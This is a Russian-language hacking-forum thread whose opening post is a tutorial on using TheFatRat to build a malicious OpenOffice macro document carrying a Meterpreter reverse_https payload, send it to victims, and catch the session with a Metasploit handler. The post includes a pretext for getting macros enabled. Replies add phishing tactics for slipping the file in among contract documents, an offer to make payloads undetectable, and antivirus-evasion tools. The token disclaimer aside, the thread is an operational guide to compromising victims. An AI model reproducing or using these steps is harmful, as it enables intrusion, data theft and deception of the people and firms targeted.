Авторская статья TheFatRat взлом Windows через OpenOffice

Тема в разделе "Пентестинг", создана пользователем Vanessa, 31 июл 2017.

Метки:
  1. Vanessa
    Vanessa

    Команда форума admin_banner

    Статус:
    Оффлайн
    3д 3ч 23м
    VLMI Coins:
    2.2VC
    770
    1.367
    2.PNG Сегодня мы поговорим о том, как с помощью инструмента TheFatRat можно взломать любой компьютер на Windows.

    OpenOffice -это бесплатная альтернатива Microsoft Office. Не так много, кто использует эту программу, но в небольших фирмах, университетах вынуждены пользоваться именно ей. В связи с тем, что нет бюджета на покупку официальной лицензии Microsoft, а нелицензионной пользоваться запрещено.
    Не используйте это в корыстных целях, чтобы рассылать вирус по почтам фирм, людей, взломать и получить всю нужную, интересную информацию. Здесь все представлено лишь для ознакомления.
    The Fat Rat - Backdoor для удаленного доступа. Использовать мы его будем на Kali Linux.

    Установка
    Код:
    git clone https://github.com/Screetsec/TheFatRat
    cd TheFatRat/
    bash setup.sh
    Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:
    Код:
    fatrat
    Можете ознакомиться и протестировать все приведенные способы взлома. Но те, что подписаны FUD, уже детектятся 10-20 антивирусами, в том числе и вирус Microsoft Office.

    Создание вируса
    [​IMG]

    Вводим
    Код:
    7
    [​IMG]

    Вводим
    Код:
    4
    и ваш IPV4 адрес, любой неиспользуемый порт, затем название документа
    [​IMG]

    Выбираем полезную нагрузку, например, 6.
    [​IMG]

    Все, ваш файл готов по указанному пути. Отправляйте жертве.
    [​IMG]

    Взлом
    Далее мы должны подождать пока сессия откроется. Используем metasploit.
    Код:
    msfconsole
    msf > use multi/handler
    msf exploit (handler) > set payload windows/meterpreter/reverse_https
    msf exploit (handler) > set LHOST (свой внутренний IP)
    msf exploit (handler)  > set LPORT 443
    msf exploit (handler) >exploit
    [​IMG]

    Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter.

    Рассылая письмом под видом важного документа, необходимо использовать СИ, чтобы разрешили запуск макросов. К примеру, "в документе приведены расчеты за каждый месяц 2017 года. Для автоматического запуска расчетов необходимо разрешить выполнение макросов. "
    Ну и все. А дальше делать в консоли можно все, что захотите. Скачивайте, скриньте итп.
    Детект вируса 2/38

    Вы не можете просматривать внешние ссылки, что-бы просмотреть зарегистрируйтесь или авторизуйтесь на форуме !

     
    Последнее редактирование: 4 авг 2017
    Alinchok, Ливень, Sergbat1 и 10 другим нравится это.

  2. sipe
    sipe

    rang2_banner

    Статус:
    Оффлайн
    0д 0ч 0м
    VLMI Coins:
    0.0VC
    12
    7
    примерно также распросторонялся вирус "петя"
     
    AlkaSeltzer нравится это.

  3. barbus
    barbus

    rang1_banner

    Статус:
    Оффлайн
    0д 0ч 0м
    VLMI Coins:
    0.0VC
    5
    0
    Попробуем на WIFI SLAX
     
    Последнее редактирование: 7 авг 2017

  4. mixa264
    mixa264

    Друг форума

    Статус:
    Оффлайн
    3д 21ч 43м
    VLMI Coins:
    13.3VC
    1.320
    1.404
    Как всегда- Великолепно!
     

  5. mixa264
    mixa264

    Друг форума

    Статус:
    Оффлайн
    3д 21ч 43м
    VLMI Coins:
    13.3VC
    1.320
    1.404
    Писать желательно, под заключение договора. Плюс несколько писем ни о чём: прайс попросить,
    как с кризисом борются, телефон спросить главного или кто это курирует. Пару раз позвонить о времени СОГЛАСОВАНИЯ и т.п. Это расчистит дорогу СИ и повысит доверие.
    Бывает при первоначальном заключении договоров требуют Выписку с ЕГЮРЛ, ОГРН,ИНН,УСТАВ, приказ о назначении. С этой толпой доков с разными расширениями( PDF, сканы, Ворд ) можно отправиь свой сюрприз))
     
    AlkaSeltzer и Vanessa нравится это.

  6. nullSafeness
    nullSafeness

    Забанен.

    Статус:
    Оффлайн
    0д 0ч 0м
    VLMI Coins:
    0.0VC
    178
    90
    Могу сделать чистку, тупо FUD, в лс
     

  7. Vanessa
    Vanessa

    Команда форума admin_banner

    Статус:
    Оффлайн
    3д 3ч 23м
    VLMI Coins:
    2.2VC
    770
    1.367
    В кали есть свои инструменты, спасибо
     

  8. Raskolnikov
    Raskolnikov

    rang3_banner

    Статус:
    Оффлайн
    0д 17ч 39м
    VLMI Coins:
    0.4VC
    185
    157
    Заинтересован в этом. Есть какие-либо материалы почитать?
     

  9. Vanessa
    Vanessa

    Команда форума admin_banner

    Статус:
    Оффлайн
    3д 3ч 23м
    VLMI Coins:
    2.2VC
    770
    1.367
    Смотря от какого антивируса нужно. Veil-evasion, shelter к примеру. В поиске есть.. Собиралась написать статьи по этому поводу. Пока руки не доходят
     
    Sergbat1, mixa264 и Raskolnikov нравится это.

  10. Tema69
    Tema69

    rang2_banner

    Статус:
    Оффлайн
    0д 5ч 57м
    VLMI Coins:
    0.0VC
    53
    8
    А статьи то полезные будут, многим ведь лень что либо искать на просторах интернета, да и здесь также
     

  11. Tema69
    Tema69

    rang2_banner

    Статус:
    Оффлайн
    0д 5ч 57м
    VLMI Coins:
    0.0VC
    53
    8
    Я вроде как о себе не говорил, читайте внимательнее!
     

  12. mixa264
    mixa264

    Друг форума

    Статус:
    Оффлайн
    3д 21ч 43м
    VLMI Coins:
    13.3VC
    1.320
    1.404
    Да, я не прав. Извини, хотя много таких кому предназначено!
     

  13. Tema69
    Tema69

    rang2_banner

    Статус:
    Оффлайн
    0д 5ч 57м
    VLMI Coins:
    0.0VC
    53
    8
    Не спорю, я о них и сам писал
     
    mixa264 нравится это.

  14. Sochi23
    Sochi23

    rang1_banner

    Статус:
    Оффлайн
    0д 19ч 13м
    VLMI Coins:
    0.1VC
    20
    2
    Отлично!!! как швейцарские часы работает, но при отправке sms невозможно поставить пробел\ жесть как плохо!!!!!
     

  15. Vanessa
    Vanessa

    Команда форума admin_banner

    Статус:
    Оффлайн
    3д 3ч 23м
    VLMI Coins:
    2.2VC
    770
    1.367
    Вроде бы вы ошиблись темой
     
    mixa264 нравится это.

  16. Sochi23
    Sochi23

    rang1_banner

    Статус:
    Оффлайн
    0д 19ч 13м
    VLMI Coins:
    0.1VC
    20
    2
    вроде нет. я этой крысой арк сделал, msfconsole meterpreter все дела. доступ к андрюше == но вот беда, то что надо было не работает. спасибо огромное крыса хороша!!!
     

  17. Vanessa
    Vanessa

    Команда форума admin_banner

    Статус:
    Оффлайн
    3д 3ч 23м
    VLMI Coins:
    2.2VC
    770
    1.367
    аа, вы вобщем про FatRat)
     

  18. Sochi23
    Sochi23

    rang1_banner

    Статус:
    Оффлайн
    0д 19ч 13м
    VLMI Coins:
    0.1VC
    20
    2
    Да конечно я об этой крысе, она хороша
     
    Vanessa нравится это.

Загрузка...